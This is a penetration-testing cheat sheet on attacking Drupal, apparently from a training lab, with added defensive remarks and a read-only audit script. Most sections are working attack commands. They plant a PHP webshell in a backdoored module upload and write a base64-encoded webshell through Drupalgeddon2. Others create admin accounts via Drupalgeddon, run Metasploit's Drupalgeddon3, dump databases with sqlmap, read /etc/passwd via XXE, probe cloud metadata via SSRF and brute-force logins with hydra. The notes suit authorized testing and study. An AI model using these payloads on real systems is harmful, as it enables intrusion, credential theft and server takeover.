# 6. Attacking Drupal

### 1. PHP Filter Module Exploitation (Drupal < 8)

```sh
curl -s http://drupal-qa.inlanefreight.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id
```

* Enable the PHP filter module and inject PHP through node content (the module was removed from core in Drupal 8).
* **Consideration:** Agree this with the client before enabling modules on their site.

### 2. Backdoored Module Upload

```sh
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
echo '<?php system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);?>' > captcha/shell.php
# each .htaccess directive needs its own line; a single line joined with ';' is not valid Apache syntax
printf '<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\n</IfModule>\n' > captcha/.htaccess
tar cvf captcha.tar.gz captcha/
curl -s drupal.inlanefreight.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id
```

* Upload malicious module via admin panel.
* **Consideration:** Avoid modifying production systems without explicit permission.

### 3. Drupalgeddon (CVE-2014-3704)

```sh
python2.7 drupalgeddon.py -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd
```

* Create admin user via SQL injection.
* **Consideration:** Impact of creating unauthorized admin accounts.

### 4. Drupalgeddon2 (CVE-2018-7600)

```sh
python3 drupalgeddon2.py
# the next line is typed into the shell drupalgeddon2.py opens on the target; it writes the decoded webshell into the docroot
echo "PD9waHAgc3lzdGVtKCRfR0VUW2ZlOGVkYmFiYzVjNWM5YjdiNzY0NTA0Y2QyMmIxN2FmXSk7Pz4K" | base64 -d | tee mrb3n.php
curl http://drupal-dev.inlanefreight.local/mrb3n.php?fe8edbabc5c5c9b7b764504cd22b17af=id
```

* Unauthenticated RCE via the user registration form (Form API render arrays).
* **Consideration:** Severity of unauthenticated RCE vulnerabilities.

### 5. Drupalgeddon3 (CVE-2018-7602)

```sh
msf6 > use exploit/multi/http/drupal_drupageddon3
msf6 > set rhosts 10.129.42.195
msf6 > set VHOST drupal-acc.inlanefreight.local
msf6 > set drupal_session SESS...
msf6 > set DRUPAL_NODE 1
msf6 > set LHOST 10.10.14.15
msf6 > exploit
```

* RCE via the Form API; requires a valid authenticated session (drupal_session) and a node ID the user can access (DRUPAL_NODE).
* **Consideration:** Session hijacking risks.

### 6. Drupal Configuration File Exploitation/Security

```sh
curl -s http://drupal.inlanefreight.local/sites/default/settings.php
ls -l sites/default/settings.php
cat .htaccess
```

* Check for exposed settings.php, extract database credentials.
* **Consideration:** settings.php holds the database credentials; it must be read-only for the web server user (Drupal's status report warns when it is writable) and never served raw by the web server.

### 7. Database Exploitation (SQL Injection - Expanded)

```sh
curl "http://drupal.inlanefreight.local/node/1?id=1'--"
curl "http://drupal.inlanefreight.local/node/1?id=1' OR '1'='1"
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --dbs --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] --tables --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] --columns --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] -C [column1,column2] --dump --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --level 5 --risk 3
```

* Manual and automated SQL injection testing.
* **Consideration:** Validate findings with alternative tools.

### 8. Form API Exploitation

```sh
curl -X POST -d "param1=value1&param2=payload" http://drupal.inlanefreight.local/form_path
```

* **Consideration:** Burp Suite is very helpful for deeper analysis.

### 9. File Upload Vulnerabilities

```sh
curl -F "file=@malicious.php" http://drupal.inlanefreight.local/upload_path
```

* Test various file extensions.
* **Consideration:** Check whether extension and MIME type restrictions are enforced server-side rather than only in the upload form.
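As an added example (not part of these notes or of Drupal's own tooling), a read-only POSIX shell audit a defender can run on the server to catch the conditions sections 2, 6 and 9 rely on: a writable settings.php, a missing sites/default/files/.htaccess, and stray .php or .htaccess files at a contributed module's root. The module-root heuristic and the fixture tree are assumptions.

```sh
#!/bin/sh
# Added example (not from the original notes or from Drupal itself): a read-only
# audit run on the Drupal server, covering the conditions sections 2, 6 and 9
# abuse. Paths under sites/ and modules/ are Drupal's standard layout; the
# heuristic for "stray" files is an assumption, so treat REVIEW lines as leads.

# Prints one line per finding and returns the number of findings (0 = clean).
audit_drupal_root() {
  root="$1"; n=0
  settings="$root/sites/default/settings.php"
  if [ ! -f "$settings" ]; then
    echo "MISSING $settings"; n=$((n + 1))
  elif [ -n "$(find "$settings" \( -perm -002 -o -perm -020 \) -print)" ]; then
    # Holds the database credentials; Drupal's status report expects it read-only.
    echo "WRITABLE $settings (group- or world-writable)"; n=$((n + 1))
  fi
  # Drupal drops this .htaccess into the files directory so uploads never run as PHP.
  if [ ! -f "$root/sites/default/files/.htaccess" ]; then
    echo "MISSING $root/sites/default/files/.htaccess (uploaded .php could execute)"; n=$((n + 1))
  fi
  # Contributed modules keep classes under src/ and tests/; a loose .php file or
  # an .htaccess at a module root is the shape of the backdoored-module upload.
  stray=$(find "$root/modules" \( -name src -o -name tests \) -prune \
            -o \( -name '*.php' -o -name '.htaccess' \) -print 2>/dev/null)
  if [ -n "$stray" ]; then
    printf '%s\n' "$stray" | sed 's/^/REVIEW /'
    n=$((n + $(printf '%s\n' "$stray" | wc -l)))
  fi
  return "$n"
}

# Constructed fixture (not a real site) reproducing each condition once.
make_sample_root() {
  root="$1"
  mkdir -p "$root/sites/default/files" "$root/modules/contrib/captcha/src"
  printf '<?php\n' > "$root/sites/default/settings.php"
  chmod 666 "$root/sites/default/settings.php"                        # writable
  printf '<?php\n' > "$root/modules/contrib/captcha/shell.php"         # stray file
  printf 'RewriteEngine On\n' > "$root/modules/contrib/captcha/.htaccess"
  printf '<?php\n' > "$root/modules/contrib/captcha/src/Captcha.php"   # legitimate
  # sites/default/files/.htaccess is deliberately absent.
}

# Demo on the fixture; on a real server: audit_drupal_root /var/www/drupal
demo=$(mktemp -d)
make_sample_root "$demo"
audit_drupal_root "$demo" || echo "exit status $? (finding count)"
rm -rf "$demo"
```

A non-zero exit status makes the function usable from cron or CI; the fixture run reports four findings.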

### 10. Access Control Vulnerabilities

```sh
curl -I http://drupal.inlanefreight.local/admin
```

* Check for a 200 response when not authenticated (an anonymous request to /admin should be redirected or denied).
* **Consideration:** Test different user roles.

### 11. Session Management Vulnerabilities

* Use Burp Suite's Sequencer and Session handling rules.

### 12. XML External Entity (XXE) Injection

```sh
curl -X POST -H "Content-Type: application/xml" -d '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>' http://drupal.inlanefreight.local/xml_endpoint
```

### 13. Server-Side Request Forgery (SSRF)

```sh
curl "http://drupal.inlanefreight.local/page?url=http://169.254.169.254/latest/meta-data/"
```

* **Consideration:** Check response for internal metadata leaks.

### 14. Drupal Brute Forcing

```sh
# wpscan is a WordPress scanner; it will not enumerate Drupal users or modules
wpscan --url http://drupal.inlanefreight.local/ --enumerate u --passwords /usr/share/wordlists/rockyou.txt
hydra -l admin -P /usr/share/wordlists/rockyou.txt drupal.inlanefreight.local http-post-form "/user/login:name=^USER^&pass=^PASS^&form_id=user_login:Invalid username or password"
```

* **Consideration:** wpscan is WordPress-specific, so use Drupal-aware tooling for Drupal authentication. Drupal core's flood control throttles repeated failed logins per IP and per account, and each failure is logged under the 'user' type in watchdog/dblog, so brute forcing is noisy and a useful detection signal for defenders.

### Additional Notes:

* **Ensure Drupal versions are known before testing specific exploits.**
* **Use enumeration tools like droopescan for discovering modules and themes.**
* **After exploitation, verify that the applied patches and mitigations actually close the finding.**
